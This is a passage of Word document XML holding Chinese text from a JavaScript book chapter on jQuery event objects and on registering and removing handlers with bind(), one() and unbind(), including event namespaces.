        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>涉及</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseout</w:t>
      </w:r>
      <w:r>
        <w:t>等过渡事件时，</w:t>
      </w:r>
      <w:r>
        <w:t>relatedTarget</w:t>
      </w:r>
      <w:r>
        <w:t>表示其他元素。例如，对于</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>事件，</w:t>
      </w:r>
      <w:r>
        <w:t>relatedTarget</w:t>
      </w:r>
      <w:r>
        <w:t>属性指鼠标指针移开的元素，</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>则是鼠标指针悬浮的元素。如果原生事件对象没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>relatedTarget</w:t>
      </w:r>
      <w:r>
        <w:t>但定义了</w:t>
      </w:r>
      <w:r>
        <w:t>toElement</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>fromElement</w:t>
      </w:r>
      <w:r>
        <w:t>，则会从这些属性中得到</w:t>
      </w:r>
      <w:r>
        <w:t>relatedTarget</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>timeStamp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件发生时的时间，单位是毫秒，由</w:t>
      </w:r>
      <w:r>
        <w:t>Date.getTime()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回。这个字段是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuer</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>自身设置的，可以解决</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>中一个长期存在的</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>which</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是一个非标准事件属性，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>做了统一化处理，使其可以用来指明在事件发生期间，按下的是哪个鼠标按钮或键盘按键。对键盘事件来说，如果原生事件没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t>，但定义了</w:t>
      </w:r>
      <w:r>
        <w:t>charCode</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t>将被设置为定义过的</w:t>
      </w:r>
      <w:r>
        <w:t>charCode</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>。对鼠标事件来说，如果</w:t>
      </w:r>
      <w:r>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t>没有定义但定义了</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>属性，会根据</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>的值来设置</w:t>
      </w:r>
      <w:r>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>表示没有按钮按下。</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>表示鼠标左键按下，</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>表示鼠标中键按下，</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>鼠标右键按下。（注意，单击鼠标右键时，有些浏览器不会产生鼠标事件。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>此外，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象的以下字段是特定于</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>添加的，有时会很有用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果注册事件处理程序时指定了额外的数据（参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.4.4</w:t>
      </w:r>
      <w:r>
        <w:t>节），处理程序可以用该字段的值来访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前正被调用的事件处理程序函数的引用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>result</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该事件最近调用的处理程序的返回值，忽略没有返回值的处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>originalEvent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器生成的原生事件对象的引用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="482" w:name="19_4_4_Shi_Jian_Chu_Li_Cheng_Xu_De_Gao_J"/>
      <w:r>
        <w:t>19.4.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　事件处理程序的高级注册</w:t>
      </w:r>
      <w:bookmarkEnd w:id="482"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们已经看到，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了相当多简单的方法来注册事件处理程序。所有这些方法都是简单地调用单一的、更复杂的方法</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>来为命名的事件类型绑定处理程序，该处理程序会绑定到</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>对象中的每一个元素上。直接使用</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>可以让我们使用事件注册的高级特性，这些特性在较简单的方法上是不可用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在最简形式下，</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>需要一个事件类型字符串作为其第一个参数，以及一个事件处理程序函数作为其第二个参数。事件注册的简单方法使用该形式的</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，调用</w:t>
      </w:r>
      <w:r>
        <w:t>$('p').click(f)</w:t>
      </w:r>
      <w:r>
        <w:t>等价：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('p').bind('click',f);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>时还可以带有三个参数。在这种形式下，事件类型是第一个参数，处理程序函数是第三个参数。在这两个参数中间可以传入任何值，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会在调用处理程序前，将指定的值设置为</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性。通过这种方式传递额外的数据给处理程序，不需要使用闭包，有时很有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>还有其他高级特性。如果第一个参数是由空格分隔的事件类型列表，则处理程序函数会为每一个命名的事件类型注册。例如，调用</w:t>
      </w:r>
      <w:r>
        <w:t>$('a').hover(f)</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.4.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）等同于</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('a').bind('mouseenter mouseleave',f);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>的另一个重要特性是允许为注册的事件处理程序指定命名空间。这使得可以定义处理程序组，能方便后续触发或卸载特定命名空间下的处理程序。处理程序的命名空间对于开发可复用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>代码的类库或模块的程序员来说特别有用。事件命名空间类似</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的类选择器。要绑定事件处理器到命名空间中时，添加句点（</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>）和命名空间名到事件类型字符串中即可：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序在在命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>"myMod"</w:t>
      </w:r>
      <w:r>
        <w:t>中把</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>绑定到所有元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('a').bind('mouseover.myMod',f);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>甚至还可以给处理程序分配多个命名空间，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>"myMod"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"yourMod"</w:t>
      </w:r>
      <w:r>
        <w:t>中作为</w:t>
      </w:r>
      <w:r>
        <w:t>mouseout</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序绑定</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('a').bind('mouseout.myMod.yourMod',f);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>的最后一个特性是，第一个参数可以是对象，该对象把事件名映射到处理程序函数。再次使用</w:t>
      </w:r>
      <w:r>
        <w:t>hover()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来举例，调用</w:t>
      </w:r>
      <w:r>
        <w:t>$('a').hover(f,g)</w:t>
      </w:r>
      <w:r>
        <w:t>等价于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('a').bind({mouseenter:f</w:t>
      </w:r>
      <w:r>
        <w:t>,mouseleave:g});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当使用</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>的这种形式时，传入对象的属性名可以是空格分隔的事件类型的字符串，也可包括命名空间。如果在第一个对象参数之后还指定了第二个参数，其值会用做每一个事件绑定的数据参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>还有另一个事件处理程序注册方法。调用</w:t>
      </w:r>
      <w:r>
        <w:t>one()</w:t>
      </w:r>
      <w:r>
        <w:t>方法就和</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，二者的工作原理也类似，除了在调用事件处理程序之后会自动注销它。这意味着，和该方法名字暗示的一样，使用</w:t>
      </w:r>
      <w:r>
        <w:t>one()</w:t>
      </w:r>
      <w:r>
        <w:t>注册的事件处理器永远只会触发一次。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>17.2.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）可以注册捕获事件的处理程序，</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>one()</w:t>
      </w:r>
      <w:r>
        <w:t>没有该特性。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>以下版本）不支持捕获处理程序，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>不打算模拟该特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="483" w:name="19_4_5_Zhu_Xiao_Shi_Jian_Chu_Li_Cheng_Xu"/>
      <w:r>
        <w:t>19.4.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　注销事件处理程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="483"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>（或任何更简单的事件注册方法）注册事件处理程序后，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>来注销它，以避免在将来的事件中触发它。（注意，</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>只注销用</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>和相关</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法注册的事件处理程序。通过</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>attachEven</w:t>
      </w:r>
      <w:r>
        <w:t>t()</w:t>
      </w:r>
      <w:r>
        <w:t>方法注册的处理器不会注销，并且不会移除通过</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>onmouseover</w:t>
      </w:r>
      <w:r>
        <w:t>等元</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>素属性定义的处理程序。）不带参数时，</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>会注销</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中所有元素的（所有事件类型的）所有事件处理程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('*').unbind();//</w:t>
      </w:r>
      <w:r>
        <w:t>从所有元素中移除所有</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>带有一个字符串参数时，由该字符串指明的事件类型（可以是多个，当字符串含有多个名字时）的所有处理程序会从</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的所有元素中取消绑定：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>从所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中取消绑定所有</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseou</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('a').unbind("mouseover mouseout");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是很粗劣的方式，不应该在模块化代码中使用，因为模块的使用者有可能使用其他模块，在其他模块中有可能在相同的元素上给相同的事件类型注册了其他处理程序。如果模块使用命名空间来注册事件处理程序，则可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>，传入一个参数，来做到只注销命名空间下的处理程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>取消绑定在</w:t>
      </w:r>
      <w:r>
        <w:t>"myMod"</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间下的所有</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseout</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('a').unbind("mouseover.myMod mo</w:t>
      </w:r>
      <w:r>
        <w:t>useout.myMod");//</w:t>
      </w:r>
      <w:r>
        <w:t>取消绑定在</w:t>
      </w:r>
      <w:r>
        <w:t>"myMod"</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间下的所有事件类型的处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('a').unbind(".myMod");//</w:t>
      </w:r>
      <w:r>
        <w:t>取消绑定同时在</w:t>
      </w:r>
      <w:r>
        <w:t>"ns1"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"ns2"</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间下的单击处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
